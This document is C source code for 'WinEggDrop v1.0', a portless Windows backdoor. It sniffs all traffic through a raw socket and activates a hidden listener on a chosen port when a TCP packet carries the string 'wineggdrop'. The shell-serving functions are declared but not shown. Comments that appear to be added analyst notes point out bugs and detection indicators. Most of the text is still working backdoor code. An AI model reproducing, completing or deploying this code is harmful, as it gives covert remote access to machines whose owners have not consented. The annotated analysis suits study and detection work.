WinEggDrop v1.0 源代码

//**********************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: NULL
// Purpose: To Demonstrate Some Portless Backdoor Technique
// Test PlatForm: Win 2K Pro And Server SP4
// Compiled On: LCC 3.0,May Compile On VC++ 6.0(Not Tested Yet)
//**********************************************************************

#include <windows.h>
#include <stdio.h>
#include <winsock2.h>

// Some Structures To Define
#define  IP_HDRINCL        2                     // Raw-socket option value; declared but not referenced in this excerpt
#define SIO_RCVALL         _WSAIOW(IOC_VENDOR,1) // Winsock "receive all" ioctl; DoSniffing uses it so the raw socket is handed every packet the NIC sees
#define MAX_PACK_LEN    65535                    // Receive buffer size: the largest IPv4 datagram (total_len is 16 bits)
#define MAX_ADDR_LEN     16                      // Dotted-quad IPv4 text: at most 15 characters plus the NUL
#define MAX_HOSTNAME_LAN    255                  // Size of the gethostname() buffer in DoSniffing

typedef struct _iphdr               // IPv4 header as laid out on the wire; 20 bytes when no options follow (assumes 32-bit unsigned int)
{
   unsigned char  h_lenver;         // Low 4 bits: header length in 32-bit words (DecodeIPPack masks with 0xf); high 4 bits: version
   unsigned char  tos;              // Type of service
   unsigned short total_len;        // Total datagram length
   unsigned short ident;            // Identification
   unsigned short frag_and_flags;   // Flags and fragment offset
   unsigned char  ttl;              // Time to live
   unsigned char  proto;            // Transport protocol; DecodeIPPack only continues when this equals IPPROTO_TCP
   unsigned short checksum;         // Header checksum
   unsigned int   sourceIP;         // Source address, wire byte order (DecodeIPPack assigns it to sin_addr without conversion)
   unsigned int   destIP;           // Destination address, wire byte order; not read in this excerpt
}IP_HEADER;

typedef struct _tcphdr              // TCP header as laid out on the wire; 20 bytes when no options follow
{
   USHORT th_sport;                 // Source port, network byte order (DecodeTCPPack applies ntohs)
   USHORT th_dport;                 // Destination port, network byte order
   unsigned int  th_seq;            // Sequence number
   unsigned int  th_ack;            // Acknowledgement number
   unsigned char th_lenres;         // High 4 bits: data offset in 32-bit words (DecodeTCPPack shifts right by 4); low 4 bits reserved
   unsigned char th_flag;           // Control flags
   USHORT th_win;                   // Window size
   USHORT th_sum;                   // Checksum
   USHORT th_urp;                   // Urgent pointer
}TCP_HEADER;
// End Of Structure

// Global Variable
char SourceIPAddress[MAX_ADDR_LEN];    // Dotted-quad source address of the most recent TCP packet decoded; written by DecodeIPPack, printed by DecodeTCPPack (the author notes it could serve a reverse connection)
int  BackDoorPort = 0;     // Port the backdoor listener uses; main sets it from argv[1] or to the default 1982

// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL   InitSocket();                                                      // WSAStartup wrapper
BOOL   DoSniffing();                                                      // Raw-socket capture loop; starts the backdoor thread when the trigger is seen
BOOL   DecodeIPPack(const char *Buffer,const int BufferSize);             // Filters for TCP, records the sender address, defers to DecodeTCPPack
BOOL   DecodeTCPPack(const char * TCPBuffer,const int BufferSize);        // Searches the TCP payload for the activation string
BOOL   IsWin2KOrAbove();                                                  // Defined beyond this excerpt
DWORD  WINAPI StartBackDoor(LPVOID Para);                                 // Thread entry created by DoSniffing; defined beyond this excerpt
BOOL   GetABackDoorShell(const SOCKET ListenSocket);                      // Defined beyond this excerpt
BOOL     SendSocket(const SOCKET ClientSocket,const char *Message);       // Defined beyond this excerpt
unsigned int ReceiveMessageFromSocket(const SOCKET ClientSocket,char *Buffer,const int BufferSize);   // Defined beyond this excerpt
//------------------------------------------------------------------------------------------------------
// End Of Function ProtoType Declaration

// Main Function
// Entry point.  Refuses to run on anything older than Windows 2000, takes the
// listener port from argv[1] (parsed with atoi, so a non-numeric argument
// silently yields port 0) or defaults to 1982, starts Winsock, then blocks in
// DoSniffing.  Returns -1 on either start-up failure and 0 if DoSniffing ever
// returns; DoSniffing's own result is discarded.
int main(int argc,char *argv[])
{
 if (!IsWin2KOrAbove())    // Platform gate; IsWin2KOrAbove is defined beyond this excerpt
 {
    printf("The Program Must Run Under Win 2k Or Above OS\n");    // Display This Message
    return -1;    // Quit The Program
 }

 if (argc == 2)      // Exactly one argument: the listener port
    BackDoorPort = atoi(argv[1]);      // No range or format validation is done on the argument
 else    // No Argument
    BackDoorPort = 1982;      // Built-in default port

 if (!InitSocket())     // Winsock could not be started
 {
    printf("Fail To Start Up Winsock\n");    // Display Error Message
    return -1;    // Quit The Program
 }
 DoSniffing();    // Blocks here until recv() fails; the TRUE/FALSE result is ignored
 return 0;     // Quit The Program
}// End Of Main Function

//-------------------------------------------------------------------------
// Purpose: To Initialize Socket
// Return Type: Boolean
// Parameters:  NULL
// This Is Too Simple,I Won't Comment It
//-------------------------------------------------------------------------
// Starts Winsock, requesting version 2.2.  Returns FALSE when WSAStartup
// fails.  The version the provider actually negotiated (data.wVersion) is
// never examined.
BOOL InitSocket()
{
 WSADATA data;
 WORD ver;

 ver = MAKEWORD(2,2);      // Request Winsock 2.2
 if (WSAStartup( ver, &data )!= 0 )
 {
     return FALSE;         // Winsock unavailable or refused the request
 }
 return TRUE;
}// End Of InitSocket Function

//-------------------------------------------------------------------------
// Purpose: To Do None-Driver Sniffing
// Return Type: Boolean
// Parameters:  NULL
//-------------------------------------------------------------------------
// Capture loop.  Opens a raw IP socket bound to the host's first address,
// switches it to SIO_RCVALL so every packet reaching that NIC is delivered to
// this process, and feeds each datagram to DecodeIPPack.  When DecodeIPPack
// reports the trigger, StartBackDoor (defined beyond this excerpt) is run on a
// new thread and capture is suspended until that thread exits.  Returns FALSE
// on any set-up failure and TRUE only after recv() reports an error.
// Analysis notes: a raw socket in SIO_RCVALL mode needs elevated rights on the
// stated test platform and is itself a host-level indicator of this sample;
// the malloc'd hostent is leaked immediately and the pointer later passed to
// free() is the one gethostbyname returned, which the process did not allocate;
// the thread handle from CreateThread is never closed.
BOOL DoSniffing()
{
 int Length=0;    // Number of bytes returned by the last recv()
 char RecvBuf[MAX_PACK_LEN] = {0};     // Receive buffer; zeroed before every recv() so DecodeTCPPack's strstr finds a terminator
 SOCKET SocketRaw = INVALID_SOCKET;    // Raw Socket

 SocketRaw = socket(AF_INET , SOCK_RAW , IPPROTO_IP);    // Raw IP socket: headers are delivered along with the payload
 if (SocketRaw == INVALID_SOCKET)      // Fail To Create A Raw Socket
 {
    printf("Fail To Create A Raw Socket\n");    // Display Error Message
    return FALSE;    // Return False
 }

 char FAR name[MAX_HOSTNAME_LAN];

 if (gethostname(name, MAX_HOSTNAME_LAN) == SOCKET_ERROR)      // Fail To Get The Host Name
 {
    printf("Fail To Get Host Name\n");    // Display Error Message
    closesocket(SocketRaw);      // Close The Raw Socket Created
    return FALSE;    // Return False
 }

 // Resolve the local host name to pick the address the raw socket binds to
 struct hostent FAR * pHostent;
 pHostent = (struct hostent * )malloc(sizeof(struct hostent));    // This allocation is overwritten on the next line and never freed
 pHostent = gethostbyname(name);                                  // Winsock-owned result; a NULL return is not checked before use below
 SOCKADDR_IN sa;
 sa.sin_family = AF_INET;     // That's Internet Related
 sa.sin_port = htons(0);      // Port is irrelevant for a raw socket; let the OS choose
 if (pHostent->h_addr_list[0] != 0)    // Only the first address of the host is considered
 {
    memcpy(&sa.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], pHostent->h_length);    // Bind target: first address in the list
 }
 else    // The host name resolved to no address
 {
    printf("Get Host By Name Fails\n");      // Display Error Message
    free(pHostent);     // Frees the gethostbyname result, not the earlier malloc
    closesocket(SocketRaw);
    return FALSE;    // Return FALSE;
 }
 free(pHostent);     // Same as above: this pointer did not come from malloc

 if (bind(SocketRaw, (PSOCKADDR)&sa, sizeof(sa)) == SOCKET_ERROR)    // Bind The Raw Socket On The First NIC,But Fails
 {
    printf("Fail To Bind\n");    // Display Error Message
    closesocket(SocketRaw);      // Close The Raw Socket
    return FALSE;    // Return False
 }

 // Enable SIO_RCVALL on the bound socket: from here on the socket receives all packets the interface sees, not only those addressed to it
 DWORD dwBufferLen[10] ;
 DWORD dwBufferInLen = 1 ;       // 1 = turn receive-all on
 DWORD dwBytesReturned = 0 ;

 if (WSAIoctl(SocketRaw, SIO_RCVALL,&dwBufferInLen, sizeof(dwBufferInLen),&dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL) == SOCKET_ERROR)
 {
    closesocket(SocketRaw);      // Receive-all mode unavailable; no message is printed for this failure
    return FALSE;
 }

 while(TRUE)      // Capture loop; the only exit is a recv() error
 {
    memset(RecvBuf, 0, sizeof(RecvBuf));     // Clear stale bytes so payload scanning stops at the end of the new datagram
     Length = recv(SocketRaw, RecvBuf, sizeof(RecvBuf), 0);    // One IP datagram per call, headers included
    if (Length == SOCKET_ERROR)     // Get Error As Receiving Data
    {
       printf("Fail To Receive Data\n");     // Display Error Message
       break;     // Leave The Loop
    }
    if (DecodeIPPack(RecvBuf,Length))     // TRUE only when a TCP payload carried the activation string
    {
       printf("Bingo,The BackDoor Is Activated On Port %d\n",BackDoorPort);      //We Are Going To Activate The BackDoor
       DWORD dwThreadID;
       HANDLE BackDoorThread = CreateThread(NULL,0,&StartBackDoor,NULL,0,&dwThreadID);    // StartBackDoor is defined beyond this excerpt; the CreateThread result is not checked
       WaitForSingleObject(BackDoorThread,INFINITE);     // Capture pauses for the lifetime of the backdoor thread; the handle is never closed
    }
 }

 closesocket(SocketRaw);      // Close The Raw Socket
 return TRUE;     // Reached only via the break above
}// End Of DoSniffing Function

//-------------------------------------------------------------------------
// Purpose: To Decode The IP Packet
// Return Type: Boolean
// Parameters:  1.const char *Buffer   -->The Received Buffer
//              2.Const int BufferSize -->The Received Buffer Size
//-------------------------------------------------------------------------
// Examines one received IP datagram.  Returns FALSE for anything that is not
// TCP; otherwise stores the sender's dotted-quad address in the global
// SourceIPAddress and returns DecodeTCPPack's verdict on the payload.
// Analysis notes: BufferSize is never compared with sizeof(IP_HEADER) or with
// the header length read from the packet, and the size forwarded to
// DecodeTCPPack is the whole datagram length rather than the remainder after
// the IP header.
BOOL DecodeIPPack(const char *Buffer,const int BufferSize)
{
 IP_HEADER *pIpheader;     // IP Header
 SOCKADDR_IN saSource, saDest;      // saDest is declared but never used
 pIpheader = (IP_HEADER *)Buffer;      // Reinterpret the receive buffer as an IP header; no length check precedes this
 int Protocol = pIpheader->proto;      // Transport protocol byte
 if ((Protocol != IPPROTO_TCP))     // Only TCP segments are inspected for the trigger
 {
    return FALSE;
 }

 saSource.sin_addr.s_addr = pIpheader->sourceIP;      // Copied as-is; the wire field and s_addr share byte order
 strncpy(SourceIPAddress, inet_ntoa(saSource.sin_addr), MAX_ADDR_LEN);     // A dotted quad is at most 15 characters, so the 16-byte global stays NUL-terminated

 int IPLength = sizeof(unsigned long) * (pIpheader->h_lenver & 0xf);    // Header length field counts 32-bit words; this also skips any IP options
 return DecodeTCPPack(Buffer+IPLength, BufferSize);      // Hand the TCP header to the payload check (BufferSize is not reduced by IPLength)
}// End Of DecodeIPPack Function

//-------------------------------------------------------------------------
// Purpose: To Decode The TCP Packet
// Return Type: Boolean
// Parameters:  1.const char *TCPBuffer  -->The TCP Buffer
//              2.Const int BufferSize   -->The TCP Buffer Size
//-------------------------------------------------------------------------
// Looks for the activation string in a TCP segment's payload.  Prints the
// sender address/port and the local port and returns TRUE when the payload
// contains "wineggdrop"; returns FALSE otherwise.
// Analysis notes: BufferSize is unused, so the scan is bounded only by the
// first NUL byte, which DoSniffing guarantees by zeroing the receive buffer
// before each recv().  The cleartext trigger string is a usable network
// signature for this sample.
BOOL DecodeTCPPack(const char * TCPBuffer,const int BufferSize)
{
 TCP_HEADER * pTcpHeader;     // TCP Header
 int iSourcePort,iDestPort;      // Source Port And DestPort

 pTcpHeader = (TCP_HEADER * )TCPBuffer;      // Reinterpret the buffer as a TCP header; no length check
 int TcpHeaderLen =  pTcpHeader->th_lenres>>4;     // Data offset field, in 32-bit words
 TcpHeaderLen *= sizeof(unsigned long);      // Convert to bytes; this also skips TCP options
 char * TcpData=TCPBuffer+TcpHeaderLen;      // Start of the payload (the const qualifier is dropped here)

 iSourcePort = ntohs(pTcpHeader->th_sport);     // Get The Source Port
 iDestPort = ntohs(pTcpHeader->th_dport);    // Get The Destination Port
 if (strstr(TcpData,"wineggdrop")!=NULL)     // Trigger: the activation string appears anywhere in the payload, on any port
 {
    printf("%s:%d-->Local:%d\r\n",SourceIPAddress,iSourcePort,iDestPort);     // SourceIPAddress was filled in by DecodeIPPack for this datagram
    return TRUE;     // Caller starts the backdoor thread
 }
 return FALSE;    // No trigger in this segment
}// End Of DecodeTCPPack Function

//-------------------------------------------------------------------------
